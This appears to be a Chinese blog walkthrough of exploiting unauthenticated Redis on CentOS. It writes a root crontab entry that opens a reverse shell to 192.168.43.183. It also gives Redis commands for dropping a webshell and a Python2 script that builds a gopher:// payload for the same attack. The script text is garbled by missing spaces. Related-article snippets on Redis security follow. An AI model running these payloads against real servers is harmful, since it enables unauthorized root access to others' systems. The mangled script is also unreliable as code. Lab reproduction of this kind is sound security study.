redis linux安全扫描漏洞,3. redis未授权漏洞复现(写入linux计划任务反弹shell)

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量362 收藏
点赞数
文章标签: redis linux安全扫描漏洞

前提:

1.靶机是Centos环境

2.redis低版本,具体低于多少不清楚

——————主要几个命令操作——————

flushall             //清空所有key值

config get dir        //获取路径

config set dir /**/**/      //设置路径

set xxx '

一句话木马

'  //设置xxx值为一句话木马

config set dbfilename 111.jsp/  /设置文件名

save              //将xxx默认写入到111.jsp

方式一:直接用进入redis写入计划任务(失败,未成功反弹shell,失败原因:未知,到靶机系统查看文件也成功写入了,但是和下面使用脚本写的就是格式上有点不一样)

1.set 1 '

*/1 * * * * bash -i >& /dev/tcp/192.168.43.183/7777 0>&1

'

2.config set dir /var/spool/cron/

3.config set dbfilename root

4.save

dc0068b5c45195cc8a5633fb34fd7fea.png

方式二:使用脚本写入(原理和上面同理,成功率高)

ip是目标系统的,server_ip是接收shell的

importurllib

protocol="gopher://"ip='192.168.43.144'port='6379'reverse_ip="192.168.43.183"reverse_port="4444"cron="*/1 * * * * bash -i >& /dev/tcp/%s/%s 0>&1"%(reverse_ip,reverse_port)

filename="root"path="/var/spool/cron"passwd=""cmd=["flushall","set 1 {}".format(cron.replace(" ","${IFS}")),"config set dir {}".format(path),"config set dbfilename {}".format(filename),"save"]ifpasswd:

cmd.insert(0,"AUTH {}".format(passwd))

payload=protocol+ip+":"+port+"/_"

defredis_format(arr):

CRLF=""redis_arr= arr.split(" ")

cmd=""cmd+="*"+str(len(redis_arr))for x inredis_arr:

cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")

cmd+=CRLFreturncmdif __name__=="__main__":for x incmd:

payload+=urllib.quote(redis_format(x))print payload

1.改好脚本后运行:python2 redis.py

64eb1348e6f4727511b49fc6d5be19d6.png

2.curl命令执行

d194b40d6202f41d6f577d0c40895727.png

3.监听成功

5e6d11b3ebaa5efbadc4804033392ebb.png

参考链接:

https://mp.weixin.qq.com/s/Vj24aRbr3P7Pg59HE3SpRQ

Valkla
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞】---- Redis 4.x/5.x 授权访问漏洞
qq_43168364的博客
12-24 1241
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。Redis提供了多种语言的API。Redis默认使用6379端口 Redis授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis授权访问在4.x/5.0.5以前
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Redis授权扫描脚本
weixin_30367945的博客
12-29 173
Rescan Redis Unauthorized Scan Lib https://github.com/google/ipaddr-py git clone https://github.com/google/ipaddr-py.git cd ipaddr-py sudo python setup.py install https://pypi.python.org/pypi/futures...
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 1043
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
Redis数据库漏洞防护
creamy521的专栏
04-24 573
转自:http://www.hackdig.com/11/hack-28666.htm Redis是一个高性能的数据库,Redis Crackit及Redis安全漏洞本质上是由于Redis自身缺乏安全防护机制,同时Redis的使用者又曾遵循官方的安全规范所导致的。 Redis安全漏洞 对于安全漏洞的防护,很多面向大数据的应用架构(NOSQL、Caching)都存在类
Linux 由于redis授权漏洞被***
weixin_34195546的博客
11-30 190
早上睡觉被一条条的阿里云服务器告警信息惊醒,提示我的服务器CPU使用率超过80%,我就纳闷了我的服务器平时CPU使用率还不到10%,这次怎么会这么高。服务器有异常是肯定的了,我的服务器在云控制台配置了安全组策略,服务器修改了ssh端口,开启了防火墙,设置了hosts.allow hosts.deny等防范措施。这都能被***我也是醉了。登上服务器,首先用top查看[root@...
Redis授权漏洞检测工具
09-02 823
Redis授权检测小工具 #!/usr/bin/python3 # -*- coding: utf-8 -*- """ @Author: r0cky @Time: 2019/9/2-17:35 """ import socket import sys passwds = ['redis','root','oracle','password','p@ssw0rd','abc123!',...
redis安全学习小记1
08-03
为了防止授权访问,Redis提供了一种简单的认证机制,通过`config set requirepass`命令设置密码,或者在配置文件中添加`requirepass`字段。一旦设置了密码,客户端必须先使用`AUTH`命令传递密码才能执行其他操作。...
redis监控模板-配置-脚本.zip
11-17
3. **redis-template.xml**:这是一个Zabbix监控模板文件,定义了Zabbix如何监控Redis。模板包含了一系列的Zabbix项(items)、触发器(triggers)、图形(graphs)和屏幕(screens),用于跟踪Redis的各种性能指标...
一键离线部署redis主从哨兵集群-shell脚本(只需一分钟即可)
05-31
Redis 是一个高性能的键值对存储系统,常用于数据库、缓存和消息中间件等场景。在内网或离线环境中部署 Redis 集群,尤其是主从哨兵(Sentinel)集群,往往需要手动配置,费时费力。本文将详细介绍如何使用 shell ...
如何高效地向Redis插入大量的数据(推荐)
09-09
在处理大数据量的存储任务时,Redis作为一个高性能的键值存储系统,其高效的数据插入能力至关重要。本文将探讨如何高效地向Redis插入大量数据,重点介绍Redis的管道(Pipeline)模式以及其优势。 首先,我们了解为...
被动式漏洞扫描系统.zip
03-08
Gourdscan v2.1 被动式漏洞扫描系统 Passive Vulnerability Scan 为避免 Gourdscan 被恶意利用,开源版本只放出了简单的探测规则,无法用作为黑客入侵工具。请使用者遵守《中华人民共和国网络安全法》,勿将 Gourdscan 用于授权的测试,参与项目的社区成员/YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。 安装依赖: Linux 安装 Redis apt-get install redis-server 或从源码编译安装 wget http://download.redis.io/redis-stable.tar.gz && tar xzf redis-stable.tar.gz && cd redis-stable && make && make install 系统已有 Redis 的,运行 redis-server --version 查看自己的版本,需注意2.x版本的 Redis 会有问题 安转 python 类库 基础模块 安装pip wget https://sec.ly.com/mirror/get-pip.py --no-check-certificate && python get-pip.py -i https://mirrors.aliyun.com/pypi/simple/ $ pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 其他事项 以下如果有报错便可以安装,一般不需要安装 镜像: https://sec.ly.com/mirror/libdnet-libdnet-1.12.tar.gz https://sec.ly.com/mirror/pylibpcap-0.6.4.tar.gz $ wget https://github.com/dugsong/libdnet/archive/master.zip && unzip master.zip $ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz && tar zxf pylibpcap-0.6.4.tar.gz Windows 下载 Redis https://sec.ly.com/mirror/Redis-x64-3.2.100.zip 启动 Redis redis-server.exe GourdScan路径\conf\redis.conf 如需使用网卡抓包方式,同程src已有各依赖镜像,可以把exe文件都装上 https://sec.ly.com/mirror/dnet-1.12.win32-py2.7.exe https://sec.ly.com/mirror/dpkt-1.7.win32.exe https://sec.ly.com/mirror/pcap-1.1.win32-py2.7.exe https://sec.ly.com/mirror/WinPcap_4_1_3.exe OSX 安装 homebrew /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 安装 redis brew install redis 启动 redis redis-server conf/redis.conf 安装依赖 pip install pcapy -i https://pypi.doubanio.com/simple/ git clone https://github.com/dugsong/libdnet.git && cd libdnet && ./configure && make && cd python && python setup.py install 使用方法: redis-server conf/redis.conf python gourdscan.py conf.json 默认平台用户名密码为:admin:Y3rc_admin 默认redis密码为:Y3rc_Alw4ys_B3_W1th_Y0u 如果有勾选sqlmap api scan选项,请在服务器上开启sqlmap api。 一切正常的话你就可以在8000端口上访问到 GourdScanV2 的 web 界面了 Start Monitor 中提供了三种代理方式,区别的话在下方文档有
Redis授权漏洞检测方法+Redis基础+Redis环境搭建+Redis恶意利用
t小小小白的博客
08-23 2276
Redis授权漏洞检测方法+Redis基础+Redis环境搭建+Redis恶意利用作者:山丘安全攻防实验室 O8前言一、Redis命令基础二、Redis漏洞授权挖掘二、Redis环境搭建与概述1)环境概述2)环境搭建三、漏洞利用1)授权漏洞利用说明2)root权限漏洞利用1、创建ssh公匙2、创建一个O8.txt密匙3、清除Redis所有数据4、 Redis创建恶意key5、修改Redis路...
redis漏洞利用
欢迎来到D的博客!
01-21 1280
redis漏洞利用方式总结
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3445
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
redis授权漏洞
CSDNRomance的博客
05-08 150
今天随便找了一个萨瓦迪卡的网站,用扫描扫描出来了一个redis授权访问漏洞,准备下这个漏洞,因此写个笔记记录一下。redis端口号:6379。验证:无口令远程登陆。
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4561
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3148
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权反弹shell
weixin_34235371的博客
05-15 191
rt发一处redis授权,进行反弹shell。输入反弹命令:主机监听端口:反弹成功。 转载于:https://blog.51cto.com/13539934/2395206
以下哪些方式可以结合或利用redis服务进行攻击? 在redis写入ssh公钥,获取操作系统权限 在crontab里写入定时任务反弹shell 组合SSRF漏洞攻击redis服务 redis主从制RCE
06-09
2. 在 crontab 里写入定时任务反弹 Shell:攻击者可以通过 Redis 服务将定时任务写入 crontab 中,并设置反弹 Shell 的命令,然后等待任务执行,获取 Shell 权限。 3. 组合 SSRF 漏洞攻击 Redis 服务:攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值